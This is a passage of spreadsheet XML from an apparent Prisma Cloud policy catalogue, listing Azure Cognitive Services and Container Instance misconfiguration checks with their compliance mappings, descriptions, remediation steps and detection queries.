      </c>
      <c r="H22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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2232" t="inlineStr">
        <is>
          <t>azure-cognitive-services</t>
        </is>
      </c>
      <c r="K2232" t="inlineStr">
        <is>
          <t>Azure Cognitive Services account not configured with private endpoint</t>
        </is>
      </c>
      <c r="L2232" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2232" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2232" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2232" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2232" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2232" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R2232" t="inlineStr">
        <is>
          <t>AAT-12.2:Data Source Integrity</t>
        </is>
      </c>
      <c r="S2232" t="inlineStr"/>
      <c r="T2232" t="b">
        <v>0</v>
      </c>
      <c r="U2232" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2232" t="inlineStr">
        <is>
          <t>azure-cognitive-services-account</t>
        </is>
      </c>
      <c r="W2232" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cognitive Services accounts that are not configured with private endpoint. Private endpoints in Azure AI service resources allow clients on a virtual network to securely access data over Azure Private Link. Configuring a private endpoint enables access to traffic coming from only known networks and prevents access from malicious or unknown IP addresses which includes IP addresses within Azure. It is recommended to create private endpoint for secure communication for your Cognitive Services account.</t>
        </is>
      </c>
      <c r="X2232" t="inlineStr">
        <is>
          <t>1. Login to Azure portal
2. Navigate to 'Azure AI services'
3. Click on the reported Azure AI service
4. Configure Private endpoint connections under 'Networking' from left panel</t>
        </is>
      </c>
      <c r="Y2232" t="inlineStr"/>
      <c r="Z2232" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cognitive-services-account' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.privateEndpointConnections[*] is empty</t>
        </is>
      </c>
      <c r="AA2232" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2232" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2232" t="inlineStr">
        <is>
          <t>PC-AZR-ACS-1088</t>
        </is>
      </c>
      <c r="AD2232" t="b">
        <v>1</v>
      </c>
      <c r="AE2232" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2232" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>b8c18154-a98f-429a-819f-c12dc41f084e</t>
        </is>
      </c>
      <c r="AI2232" t="inlineStr">
        <is>
          <t>f380a8b0-f784-4273-839a-7fa9b36b02d8</t>
        </is>
      </c>
      <c r="AJ2232" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2232" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2233">
      <c r="A2233" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0</t>
        </is>
      </c>
      <c r="B2233" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2233" s="2" t="inlineStr"/>
      <c r="D2233" t="inlineStr"/>
      <c r="E2233" t="inlineStr"/>
      <c r="F2233" t="inlineStr"/>
      <c r="G2233" t="b">
        <v>0</v>
      </c>
      <c r="H22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33" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2233" t="inlineStr">
        <is>
          <t>azure-cognitive-services</t>
        </is>
      </c>
      <c r="K2233" t="inlineStr">
        <is>
          <t>Azure Cognitive Services account hosted with OpenAI is not configured with data loss prevention</t>
        </is>
      </c>
      <c r="L2233" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2233" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2233" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2233" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2233" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2233" t="inlineStr">
        <is>
          <t>Control Category: 11.0</t>
        </is>
      </c>
      <c r="R2233" t="inlineStr">
        <is>
          <t>11.a - Reporting Information Security Events</t>
        </is>
      </c>
      <c r="S2233" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2233" t="b">
        <v>0</v>
      </c>
      <c r="U2233" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2233" t="inlineStr">
        <is>
          <t>azure-cognitive-services-account</t>
        </is>
      </c>
      <c r="W2233" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cognitive Services accounts hosted with OpenAI that are not configured with data loss prevention.
Azure AI services offer data loss prevention capabilities that allow customers to configure the list of outbound URLs their Azure AI services resources can access.
As a best practice, it is recommended to enable the data loss prevention feature in OpenAI-hosted Azure Cognitive Services accounts to prevent data loss.</t>
        </is>
      </c>
      <c r="X2233" t="inlineStr">
        <is>
          <t>To enable data loss prevention on existing Azure Cognitive Services account hosted with OpenAI, follow the below URL:
https://learn.microsoft.com/en-us/azure/ai-services/cognitive-services-data-loss-prevention?tabs=azure-cli#enabling-data-loss-prevention</t>
        </is>
      </c>
      <c r="Y2233" t="inlineStr"/>
      <c r="Z2233" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cognitive-services-account' AND json.rule = kind equal ignore case OpenAI and properties.provisioningState equal ignore case Succeeded and (properties.restrictOutboundNetworkAccess does not exist or properties.restrictOutboundNetworkAccess is false or (properties.restrictOutboundNetworkAccess is true and properties.allowedFqdnList is empty))</t>
        </is>
      </c>
      <c r="AA2233" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2233" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:50</t>
        </is>
      </c>
      <c r="AC2233" t="inlineStr">
        <is>
          <t>PC-AZR-ACS-1083</t>
        </is>
      </c>
      <c r="AD2233" t="b">
        <v>1</v>
      </c>
      <c r="AE2233" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2233" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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33" t="inlineStr">
        <is>
          <t>4c4ae367-8609-4b55-ac11-e9d52849658a</t>
        </is>
      </c>
      <c r="AI2233" t="inlineStr">
        <is>
          <t>745fdc76-0c47-4e32-9bb1-3bd5f5733cf3</t>
        </is>
      </c>
      <c r="AJ2233" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2233" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2234">
      <c r="A2234" t="inlineStr">
        <is>
          <t>TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, CSA CCM v4.0.12, ITSG-33, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2234" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2234" s="2" t="inlineStr"/>
      <c r="D2234" t="inlineStr"/>
      <c r="E2234" t="inlineStr"/>
      <c r="F2234" t="inlineStr"/>
      <c r="G2234" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2234" t="inlineStr">
        <is>
          <t>azure-cognitive-services</t>
        </is>
      </c>
      <c r="K2234" t="inlineStr">
        <is>
          <t>Azure Cognitive Services account configured with local authentication</t>
        </is>
      </c>
      <c r="L2234" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2234" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2234" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2234" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2234" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2234" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2234" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2234" t="inlineStr"/>
      <c r="T2234" t="b">
        <v>0</v>
      </c>
      <c r="U2234" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2234" t="inlineStr">
        <is>
          <t>azure-cognitive-services-account</t>
        </is>
      </c>
      <c r="W2234" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cognitive Services accounts that are configured with local authentication methods instead of AD identities. Local authentication allows users to access the service using a local account and password, rather than an Azure Active Directory (Azure AD) account. Disabling local authentication methods improves security by ensuring that Cognitive Services accounts require Active Directory identities exclusively for authentication. It is recommended to disable local authentication methods on your Cognitive Services account, instead use Azure Active Directory identities.</t>
        </is>
      </c>
      <c r="X2234" t="inlineStr">
        <is>
          <t>To disable local authentication in Azure AI Services, follow the below URL:
https://learn.microsoft.com/en-us/azure/ai-services/disable-local-auth</t>
        </is>
      </c>
      <c r="Y2234" t="inlineStr"/>
      <c r="Z2234" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cognitive-services-account' AND json.rule = properties.provisioningState equal ignore case Succeeded and (properties.disableLocalAuth does not exist or properties.disableLocalAuth is false)</t>
        </is>
      </c>
      <c r="AA2234" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2234" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2234" t="inlineStr">
        <is>
          <t>PC-AZR-ACS-1096</t>
        </is>
      </c>
      <c r="AD2234" t="b">
        <v>1</v>
      </c>
      <c r="AE2234" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2234" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>ff44b578-28d0-4d0f-a747-f4efe4e25e59</t>
        </is>
      </c>
      <c r="AI2234" t="inlineStr">
        <is>
          <t>9f9c1a6b-7138-48ae-a910-00a839b614ef</t>
        </is>
      </c>
      <c r="AJ2234" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2234" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2235">
      <c r="A2235" t="inlineStr">
        <is>
          <t>CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, ITSG-33, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, SOC 2, TX-RAMP Level 1, ITSG-33, Microsoft Cloud Security Benchmark v1, SOC 2, SOC 2, ITSG-33, TX-RAMP Level 2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2235" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2235" s="2" t="inlineStr"/>
      <c r="D2235" t="inlineStr"/>
      <c r="E2235" t="inlineStr"/>
      <c r="F2235" t="inlineStr"/>
      <c r="G2235" t="b">
        <v>1</v>
      </c>
      <c r="H22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avega-ar-azure-ad, cj_test_tagBased, jbrox-AlertRule-MSTeams-Email, jbrox-all-accounts-noDDoS-policy, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I2235" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2235" t="inlineStr">
        <is>
          <t>azure-cognitive-services</t>
        </is>
      </c>
      <c r="K2235" t="inlineStr">
        <is>
          <t>Azure Storage Account storing Cognitive service diagnostic logs is publicly accessible</t>
        </is>
      </c>
      <c r="L2235" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2235" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2235" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2235" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2235" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2235" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2235" t="inlineStr">
        <is>
          <t>Access Enforcement</t>
        </is>
      </c>
      <c r="S2235" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2235" t="b">
        <v>1</v>
      </c>
      <c r="U2235" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2235" t="inlineStr">
        <is>
          <t>azure-cognitive-services-account-diagnostic-settings</t>
        </is>
      </c>
      <c r="W2235" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage Accounts storing Cognitive service diagnostic logs are publicly accessible.
Azure Storage account stores Cognitive service diagnostic logs which might contain detailed information of platform logs, resource logs, trace logs and metrics. Diagnostic log data may contain sensitive data and helps in identifying potentially malicious activity. The attacker could exploit publicly accessible storage account to get cognitive diagnostic data logs and could breach into the system by leveraging exposed data and propagate across your system.
As a best security practice, it is recommended to restrict storage account access to only the services as per business requirement.</t>
        </is>
      </c>
      <c r="X2235" t="inlineStr">
        <is>
          <t>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t>
        </is>
      </c>
      <c r="Y2235" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/write' permission. Successful execution disables public access in Azure storage account,
this disables anonymous/public read access to a container and the blobs within Azure storage account",
'impact': 'Disable anonymous/public access to a container and the blobs within Azure storage account',
'cliScriptTemplate': 'az resource update --ids $resourceId --set properties.allowBlobPublicAccess=false'</t>
        </is>
      </c>
      <c r="Z2235" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-cognitive-services-account-diagnostic-settings' AND json.rule = (properties.logs[?any(enabled equal ignore case "true")] exists or properties.metrics[?any( enabled equal ignore case "true" )] exists) and properties.storageAccountId exists as X; config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = 'totalPublicContainers &gt; 0 and (properties.allowBlobPublicAccess is true or properties.allowBlobPublicAccess does not exist)' as Y; filter '$.X.properties.storageAccountId contains $.Y.id'; show Y;</t>
        </is>
      </c>
      <c r="AA2235" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2235" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2235" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1197</t>
        </is>
      </c>
      <c r="AD2235" t="b">
        <v>1</v>
      </c>
      <c r="AE2235" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2235" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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avega-ar-azure-ad - Notifications:, AccountGroups:avega-active-directory;,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35" t="inlineStr">
        <is>
          <t>6c1f731b-beb5-4779-9fc5-f9e436d190c3</t>
        </is>
      </c>
      <c r="AI2235" t="inlineStr">
        <is>
          <t>af7266ac-1506-4251-9294-34c8b2f67ab5</t>
        </is>
      </c>
      <c r="AJ2235" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2235" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2236">
      <c r="A2236" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v10.0 [Deprecated], NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), TX-RAMP Level 2, CIS Controls v8, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ITSG-33, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO 27002:2022, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Copy of New Zealand Information Security Manual (NZISM v3.4), Matt's ATT&amp;ACK, ITSG-33, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CIS Controls v7.1, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF)</t>
        </is>
      </c>
      <c r="B2236" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2236" s="2" t="inlineStr"/>
      <c r="D2236" t="inlineStr"/>
      <c r="E2236" t="inlineStr"/>
      <c r="F2236" t="inlineStr"/>
      <c r="G2236" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2236" t="inlineStr">
        <is>
          <t>azure-aci</t>
        </is>
      </c>
      <c r="K2236" t="inlineStr">
        <is>
          <t>Azure Container Instance not configured with the managed identity</t>
        </is>
      </c>
      <c r="L2236" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2236" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2236" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2236" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2236" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2236" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2236" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2236" t="inlineStr"/>
      <c r="T2236" t="b">
        <v>0</v>
      </c>
      <c r="U2236" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2236" t="inlineStr">
        <is>
          <t>azure-container-instances-container-group</t>
        </is>
      </c>
      <c r="W2236" t="inlineStr">
        <is>
          <t>This policy identifies Azure Container Instances (ACI) that are not configured with the managed identity. The managed identity is authenticated with Azure AD, developers don't have to store any credentials in code. So It is recommended to configure managed identity on all your container instances.
For more details:
https://docs.microsoft.com/en-us/azure/container-instances/container-instances-managed-identity</t>
        </is>
      </c>
      <c r="X2236" t="inlineStr">
        <is>
          <t>To enable managed identity on your container instance; follow below URL:
https://docs.microsoft.com/en-us/azure/container-instances/container-instances-managed-identity 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-30
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-30</t>
        </is>
      </c>
      <c r="Y2236" t="inlineStr"/>
      <c r="Z2236" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-container-instances-container-group' AND json.rule = properties.provisioningState equals Succeeded and (identity.type does not exist or (identity.type exists and identity.type equal ignore case None))
{"category":"General","resourceTypes":["azurerm_container_registry_webhook"]}</t>
        </is>
      </c>
      <c r="AA2236" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2236" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2236" t="inlineStr">
        <is>
          <t>PC-AZR-ACI-794-CKV2_AZURE_30</t>
        </is>
      </c>
      <c r="AD2236" t="b">
        <v>1</v>
      </c>
      <c r="AE2236" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2236" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>a9b38d9b-a4df-4f60-bf87-c24d105d2bd9</t>
        </is>
      </c>
      <c r="AI2236" t="inlineStr">
        <is>
          <t>f5bc9117-ddad-4242-a4cd-62f59cde8375</t>
        </is>
      </c>
      <c r="AJ2236" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2236" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2237">
      <c r="A2237" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, MITRE ATT&amp;CK v12, New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), CIS Controls v8, Matt's ATT&amp;ACK, Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CIS Controls v8.1, CIS Controls v7.1, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2237" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2237" s="2" t="inlineStr"/>
      <c r="D2237" t="inlineStr"/>
      <c r="E2237" t="inlineStr"/>
      <c r="F2237" t="inlineStr"/>
      <c r="G2237" t="b">
        <v>1</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2237" t="inlineStr">
        <is>
          <t>azure-aci</t>
        </is>
      </c>
      <c r="K2237" t="inlineStr">
        <is>
          <t>Azure Container Instance is not configured with virtual network</t>
        </is>
      </c>
      <c r="L2237" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2237" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2237" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2237" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2237" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2237" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2237" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2237" t="inlineStr"/>
      <c r="T2237" t="b">
        <v>0</v>
      </c>
      <c r="U2237" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2237" t="inlineStr">
        <is>
          <t>azure-container-instances-container-group</t>
        </is>
      </c>
      <c r="W2237" t="inlineStr">
        <is>
          <t>This policy identifies Azure Container Instances (ACI) that are not configured with a virtual network. Making container instances public makes an internet routable network. By deploying container instances into an Azure virtual network, your containers can communicate securely with other resources in the virtual network. So it is recommended to configure all your container instances within a virtual network.
For more details:
https://docs.microsoft.com/en-us/azure/container-instances/container-instances-vnet</t>
        </is>
      </c>
      <c r="X2237" t="inlineStr">
        <is>
          <t>Virtual network can only be configured at the time of container instance creation. Hence, it is suggested to delete an existing container instance having not configured with virtual network and create a new container instance having virtual network configured with secure values.
Note: Backup or migrate data from the container instance before deleting it.
To create a Container Instance within a virtual network; follow below URL:
https://docs.microsoft.com/en-us/azure/container-instances/container-instances-vnet
To delete a reported Container instance; follow below URL:
https://docs.microsoft.com/en-us/azure/container-instances/container-instances-quickstart-portal#clean-up-resources</t>
        </is>
      </c>
      <c r="Y2237" t="inlineStr"/>
      <c r="Z2237" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-container-instances-container-group' AND json.rule = properties.provisioningState equals Succeeded and properties.ipAddress.type exists and properties.ipAddress.type equals Public</t>
        </is>
      </c>
      <c r="AA2237" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2237" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2237" t="inlineStr">
        <is>
          <t>PC-AZR-ACI-795</t>
        </is>
      </c>
      <c r="AD2237" t="b">
        <v>1</v>
      </c>
      <c r="AE2237" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2237" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>d480c1d2-06b3-4e53-81c9-a21ed83cb5fc</t>
        </is>
      </c>
      <c r="AI2237" t="inlineStr">
        <is>
          <t>9b413f80-4055-4afd-a634-5e45f31c8109</t>
        </is>
      </c>
      <c r="AJ2237" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2237" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2238">
      <c r="A2238" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, kfirdaus AWS Account-CS, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), New Zealand Information Security Manual (NZISM v3.4), CSA CCM v4.0.12, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), CIS Controls v7.1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2238" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2238" s="2" t="inlineStr"/>
      <c r="D2238" t="inlineStr"/>
      <c r="E2238" t="inlineStr"/>
      <c r="F2238" t="inlineStr"/>
      <c r="G2238" t="b">
        <v>1</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2238" t="inlineStr">
        <is>
          <t>azure-aci</t>
        </is>
      </c>
      <c r="K2238" t="inlineStr">
        <is>
          <t>Azure Container Instance environment variable with regular value type</t>
        </is>
      </c>
      <c r="L2238" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2238" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2238" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2238" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2238" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2238" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2238" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2238" t="inlineStr"/>
      <c r="T2238" t="b">
        <v>0</v>
      </c>
      <c r="U2238" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2238" t="inlineStr">
        <is>
          <t>azure-container-instances-container-group</t>
        </is>
      </c>
      <c r="W2238" t="inlineStr">
        <is>
          <t>This policy identifies Azure Container Instances (ACI) in which the environment variables with regular value type instead of the secure values property. Objects with secure values are intended to hold sensitive information like passwords or keys for your application. Using secure values for environment variables is both safer and more flexible than including them in your container's image. So it is recommended to secure the environment variable by specifying the 'secureValue' property instead of the regular 'value' for the variable's type.</t>
        </is>
      </c>
      <c r="X2238" t="inlineStr">
        <is>
